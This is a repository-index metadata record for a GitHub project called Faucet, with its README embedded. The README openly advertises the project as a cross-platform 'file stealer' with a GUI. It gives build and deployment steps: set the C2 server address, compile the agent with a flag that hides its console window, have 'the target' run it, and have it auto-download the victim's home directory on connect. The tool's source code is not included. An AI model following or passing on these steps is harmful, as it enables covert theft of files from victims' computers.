{"id":26896687,"url":"https://github.com/SpoofIMEI/Faucet","last_synced_at":"2025-04-01T04:01:28.397Z","repository":{"id":249826684,"uuid":"832620195","full_name":"SpoofIMEI/Faucet","owner":"SpoofIMEI","description":"Easy to use encrypted cross platform GUI file stealer.","archived":false,"fork":false,"pushed_at":"2025-03-08T15:26:03.000Z","size":529,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-20T11:39:48.512Z","etag":null,"topics":["cybersecurity","hacking","red-team","red-teaming","wails"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SpoofIMEI.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-23T11:41:04.000Z","updated_at":"2025-03-08T15:26:08.000Z","dependencies_parsed_at":"2025-03-08T16:37:25.001Z","dependency_job_id":null,"html_url":"https://github.com/SpoofIMEI/Faucet","commit_stats":null,"previous_names":["r00tendo/faucet","spoofimei/faucet"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2FFaucet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2FFaucet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2FFaucet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2FFaucet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SpoofIMEI","download_url":"https://codeload.github.com/SpoofIMEI/Faucet/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246580463,"owners_count":20800110,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","hacking","red-team","red-teaming","wails"],"created_at":"2025-04-01T04:01:27.332Z","updated_at":"2025-04-01T04:01:28.391Z","avatar_url":"https://github.com/SpoofIMEI.png","language":"CSS","funding_links":[],"categories":["CSS"],"sub_categories":[],"readme":"\n\u003cimg width=500 src=\"https://github.com/user-attachments/assets/d5a8c5bb-3cbb-4463-9390-c5e1aaeefaa2\"\u003e\u003c/img\u003e\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/go-%2300ADD8.svg?style=for-the-badge\u0026logo=go\u0026logoColor=white\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge\u0026logo=html5\u0026logoColor=white\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge\u0026logo=css3\u0026logoColor=white\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/react-%2320232a.svg?style=for-the-badge\u0026logo=react\u0026logoColor=%2361DAFB\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/Windows-0078D6?style=for-the-badge\u0026logo=windows\u0026logoColor=white\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/Linux-FCC624?style=for-the-badge\u0026logo=linux\u0026logoColor=black\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/mac%20os-000000?style=for-the-badge\u0026logo=macos\u0026logoColor=F0F0F0\"\u003e\n\u003c/p\u003e\n\n### Easy to use encrypted cross platform file stealer with an interactive GUI. Yeah that summarizes it pretty well.\nFeel free to contribute.\n\n\u003cimg src=\"https://github.com/user-attachments/assets/12251e58-3479-4be7-b8ff-4ea79b87e06f\" width=400\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/user-attachments/assets/de064cef-4f9f-4391-80ff-7286c92a95e5\" width=400\u003e\u003c/img\u003e\n\n## \u003cb\u003eServer Installation\u003c/b\u003e\n### Precompiled:\n#### Go to releases, download the executable and run it.\n### Compile yourself:\n1. \n```\ngit clone https://github.com/SpoofIMEI/Faucet\ncd Faucet/server\ngo install github.com/wailsapp/wails/v2/cmd/wails@latest\n~/go/bin/wails doctor\n```\n2. Install any missing dependencies.\n3.\n```\n~/go/bin/wails build\ncp build/bin/* ./\n```\n\n## \u003cb\u003eUsage\u003c/b\u003e\n1. Open `global.conf` and change the password.\n2. Start server.\n3. Modify `client/main.go` and change the C2 server address and password variables to the correct ones.\n4. Build the agent: `go build client/main.go` (if you don't want the terminal to pop up: `go build --ldflags -H=windowsgui client/main.go`).\n5. When the target runs the agent it should now connect to the server and display the current directory's contents.\n\n## \u003cb\u003eGlobal.conf settings\u003c/b\u003e\n* password: Password used to encrypt the traffic.\n* listen: Server listener. Format: `\u003chost\u003e:\u003cport\u003e`.\n* lootdir: Where Faucet will store downloaded files.\n* autodownload: A file/directory to be download the second the agent connects. NOTE: %user% will be translated to the home directory.\n\n### I don't really want skids using this so you have to have enough knowledge to figure out the rest yourself kek\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSpoofIMEI%2FFaucet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FSpoofIMEI%2FFaucet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSpoofIMEI%2FFaucet/lists"}